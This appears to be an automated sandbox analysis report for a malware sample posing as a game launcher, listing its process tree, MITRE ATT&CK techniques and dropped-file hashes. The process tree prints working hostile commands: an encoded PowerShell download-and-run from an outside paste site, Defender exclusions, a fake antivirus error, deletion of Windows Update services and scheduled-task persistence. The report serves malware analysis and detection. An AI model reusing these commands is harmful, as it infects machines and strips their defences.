C:\Users\Admin\Downloads\CF_Game_Center.exe
"C:\Users\Admin\Downloads\CF_Game_Center.exe"
2⤵
- Executes dropped EXE
- Enumerates system info in registry
PID:4760

C:\CF_Game_Center\downloader.exe
"C:\CF_Game_Center\downloader.exe" copy -P --transfers=4 --checkers=16 Zortosdrive1:The_Long_Drive C:\CF_Game_Center\
3⤵
- Executes dropped EXE
PID:1880

C:\CF_Game_Center\downloader.exe
"C:\CF_Game_Center\downloader.exe" copy -P --transfers=4 --checkers=16 Zortosdrive1:ULTRAKILL C:\CF_Game_Center\
3⤵
- Executes dropped EXE
PID:4344

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3860 --field-trial-handle=1816,i,8464601272276224276,16769543730599510343,131072 /prefetch:8
2⤵
PID:3900

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3248

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\BlxxxPredict-Release\BlxxxPredict-Release\jklLauncher.rar"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
PID:4124

C:\Users\Admin\AppData\Local\Temp\7zOC103392A\jklLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\7zOC103392A\jklLauncher.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
PID:1744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAYwB4ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGoAbQBwACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAWQBvAHUAcgAgAGEAbgB0AGkAdgBpAHIAdQBzACAAaQBzACAAYgBsAG8AYwBrAGkAbgBnACAAdABoAGkAcwAgAHMAbwBmAHQAdwBhAHIAZQAgAGYAcgBvAG0AIABzAHQAYQByAHQAaQBuAGcALgAgAFAAbABlAGEAcwBlACAAdAB1AHIAbgAgAG8AZgBmACAAYQBuAHQAaQB2AGkAcgB1AHMAIABhAG4AZAAgAHIAZQAtAGwAYQB1AG4AYwBoACAAdABoAGUAIABzAG8AZgB0AHcAYQByAGUALgAgACgARQByAHIANwAzACkAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGcAYwB2ACMAPgA7ACIAOwA8ACMAdQBlAHoAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGsAZwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBzAGsAYwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB1AHcAaAAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAbgB0AHIAeQAuAG8AcgBnAC8AawA0ADUAZwB6AC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBzAGQAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGYAZwBlACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHgAawBwACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwBtAGsAZgAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBuAGEAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdgB6AHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAHkAZQBpACMAPgA="
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:1840

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#jmp#>[System.Windows.Forms.MessageBox]::Show('Your antivirus is blocking this software from starting. Please turn off antivirus and re-launch the software. (Err73)','','OK','Error')<#gcv#>;
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4936

C:\Users\Admin\AppData\Roaming\yflimjst.fex0.exe
"C:\Users\Admin\AppData\Roaming\yflimjst.fex0.exe"
5⤵
- Executes dropped EXE
PID:3996

C:\Users\Admin\AppData\Roaming\yflimjst.fex1.exe
"C:\Users\Admin\AppData\Roaming\yflimjst.fex1.exe"
5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5508

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3972

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:4944

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:6076

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1008

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:5760

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:5060

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:1596

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:4384

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:2632

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:5316

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:860

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1656

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:916

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:5164

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:4392

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:5608

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:5288

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ylrgjqkpc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'WindowsProcessHost' /tr '''C:\Users\Admin\Windows\drivers\ProcHost.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows\drivers\ProcHost.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsProcessHost' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsProcessHost" /t REG_SZ /f /d 'C:\Users\Admin\Windows\drivers\ProcHost.exe' }
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5524

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#dpqubggnj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WindowsProcessHost" } Else { "C:\Users\Admin\Windows\drivers\ProcHost.exe" }
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5972

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn WindowsProcessHost
3⤵
PID:2344

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5408

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:860

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:6028

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:5940

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:3608

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:5592

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:4784

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1868

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:2196

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:5048

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:5436

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:5372

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:408

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:992

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:1116

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:6068

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:5544

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe sxupxymmiflp
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:5684

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
2⤵
PID:5884

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
3⤵
PID:5812

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
2⤵
PID:5768

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe lkxoficcooemzuoc 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkURUKK4+w1Pw5/qmjH12LC6OYQa4/P70wYCnAMFPrsRUbGOve4d9Y7dKK86LVWSl5OEP+GH/NO4cBKE3/7Wsdm7lPa+zEPgcmCIAKpT8KGG8nzalASbOL1cRjk94iUsSl8uf0jM8wBWECeo4YFIs8OTYOZTCyrFEjqvw6RYxGs4wgII3D9aHfe692oO/UgrHPRzXtcBv03uv4TQALsGpKKX/hC7LcEN8szwUTHxpONtqRo2TKvvhNGxGzlnir7jmZ0lL82OyQOtIiqBLVGxTCGtHHr6mXi976aZCe8fzK4lznEPLIspCvmUjHB1NXTxpiniUbhcHup/IoyRDvuyuuoOgvmef8yMN/wGmnmIGe5Nqn3Qh2tCfUsZfB1Zf1ubZ6uxpOBYAwzBCycVOEtjVxN7UyzbHoRT6fzV9ahOiKTEREtJJ5VYDFNYgj8X7DwGT9ctFp52l6i5JzVLSwdqe6f81mf6hgUudhCvmPKOG4/3Eg=
2⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5008

C:\Users\Admin\Downloads\Parsec (2)\parsecd.exe
"C:\Users\Admin\Downloads\Parsec (2)\parsecd.exe"
2⤵
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4364

C:\CF_Game_Center\The_Long_Drive\TheLongDrive.exe
"C:\CF_Game_Center\The_Long_Drive\TheLongDrive.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:1464

C:\CF_Game_Center\The_Long_Drive\UnityCrashHandler64.exe
"C:\CF_Game_Center\The_Long_Drive\UnityCrashHandler64.exe" --attach 1464 2037071548416
3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
PID:2920

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1464 -s 2160
3⤵
- Program crash
PID:3416

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1880

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2904

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault24161461h6661h48b3h9330h96f21bc732f7
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:5588

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd00fc46f8,0x7ffd00fc4708,0x7ffd00fc4718
2⤵
PID:5636

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,18131219493897461290,4060600369814776285,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:2
2⤵
PID:5860

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,18131219493897461290,4060600369814776285,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2336 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5880

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,18131219493897461290,4060600369814776285,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:8
2⤵
PID:6032

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6116

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault4cf4bf62he8e9h46a1ha0ddh9199dead8350
1⤵
PID:5536

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd00fc46f8,0x7ffd00fc4708,0x7ffd00fc4718
2⤵
PID:5360

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,8786838793155895037,3726855816297974305,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:2
2⤵
PID:5804

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2188,8786838793155895037,3726855816297974305,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2800 /prefetch:8
2⤵
PID:5708

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2188,8786838793155895037,3726855816297974305,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5696

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3948

C:\Users\Admin\Windows\drivers\ProcHost.exe
C:\Users\Admin\Windows\drivers\ProcHost.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ylrgjqkpc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'WindowsProcessHost' /tr '''C:\Users\Admin\Windows\drivers\ProcHost.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows\drivers\ProcHost.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsProcessHost' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsProcessHost" /t REG_SZ /f /d 'C:\Users\Admin\Windows\drivers\ProcHost.exe' }
2⤵
PID:5376

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4b0 0x33c
1⤵
PID:5076

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 408 -p 1464 -ip 1464
1⤵
PID:1520

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\CF_Game_Center\The_Long_Drive\MonoBleedingEdge\etc\mono\4.0\Browsers\Compat.browser

Filesize
1KB

MD5
0d831c1264b5b32a39fa347de368fe48

SHA1
187dff516f9448e63ea5078190b3347922c4b3eb

SHA256
8a1082057ac5681dcd4e9c227ed7fb8eb42ac1618963b5de3b65739dd77e2741

SHA512
4b7549eda1f8ed2c4533d056b62ca5030445393f9c6003e5ee47301ff7f44b4bd5022b74d54f571aa890b6e4593c6eded1a881500ac5ba2a720dc0ff280300af

Download Submit
C:\CF_Game_Center\The_Long_Drive\MonoBleedingEdge\etc\mono\4.0\DefaultWsdlHelpGenerator.aspx

Filesize
59KB

MD5
f7be9f1841ff92f9d4040aed832e0c79

SHA1
b3e4b508aab3cf201c06892713b43ddb0c43b7ae

SHA256
751861040b69ea63a3827507b7c8da9c7f549dc181c1c8af4b7ca78cc97d710a

SHA512
380e97f7c17ee0fdf6177ed65f6e30de662a33a8a727d9f1874e9f26bd573434c3dedd655b47a21b998d32aaa72a0566df37e901fd6c618854039d5e0cbef3f5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000043

Filesize
37KB

MD5
47ae9b25af86702d77c7895ac6f6b57c

SHA1
f56f78729b99247a975620a1103cac3ee9f313a5

SHA256
9bde79a1b0866f68d6baa43f920e971b5feb35a8e0af7ffadc114366f8538224

SHA512
72b5296e3dd1c5b4c42d8c3e4a56693819779167b9f02bc2d5f5a626b519a9cf10bee59846d614c929c42094b65d13039f6024f6cb1c023e740969aaefd060c4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
5KB

MD5
461c99054e41dbb45567efc434b88a31

SHA1
1855c94e95dfb0788633335d70715bc6cbdc1fa1

SHA256
25bfba97bc66998bd862f9a88eff10698d92a00bf72b409c2ba1930fbee9e0ef

SHA512
bebd89cd5102631d1dc7b51aef639517b820229652449502103101ad544d98cb0e69a688c83a72c2acac02f6e1b806c7848f967dcabc6fa150244084bbf0c2c1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
72B

MD5
ed1dacf12fa6d5228fc24656c17858eb

SHA1
db3ec582f2434b6d3d6f9e96c94c8f10a8387557

SHA256
8495d4fa9767956dd1a40e902def7d6afbe71af46709362b595c0efa4a7fcdef

SHA512
600cc030e863df814391babc4f3b63833b7307adc7b23c376e15f55e782c99b65d719a243d543f13a7c0e671526dc55027e5ed8d87c49636fc7ad0f64e64b184

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
d24b80936bba59c5cd1a41d39bae9db3

SHA1
2587d64ae2d45b6a0867324cd52bb37f15e49ab9

SHA256
edfcb4f4082d6eb688afcd367309acfca4af2f4661eecd0e69c14d133c88a24a

SHA512
e50e5108231ff78ad64a6da2b107bac088c1d4a8adecb76a9f9db2d6a5cfc0e431c5a6cddc0145a68f251d68deed74b78b1399287e8bd17aeeeeafba5d5982c1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
5KB

MD5
7a040651c840663b7edf384b07b8094c

SHA1
4288a5614a07cc4e4ccb2176e1e8a26cec105b16

SHA256
7e12c2c0a19f47a8919aab1990577537dbf76ec879e82071025bd36984ff65d6

SHA512
b96939b319854d25797e75b46f01711bbb7c9b74833b7160f45d02da376f0d5855e9dab56b893ff8589235e49461db16dea2b08632dccd1a0d98e65f70b88685

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
83a2603304a7d9a9c87933515cc96068

SHA1
2edd89c1575159b63d295689a67ef909db0d464a

SHA256
f3f35135e603b56881ddad2513726528ff97c79aa2f68552e64c072a40fe6454

SHA512
8c4928922e0df99e4d21a11d3551d5801154d6a4943faa70f7a98a9c346cb7a13b0f8d1df121121d6f7767ee3280eb811f8fde76c0fb6218e7d59f6fef8d02a1

Download Submit
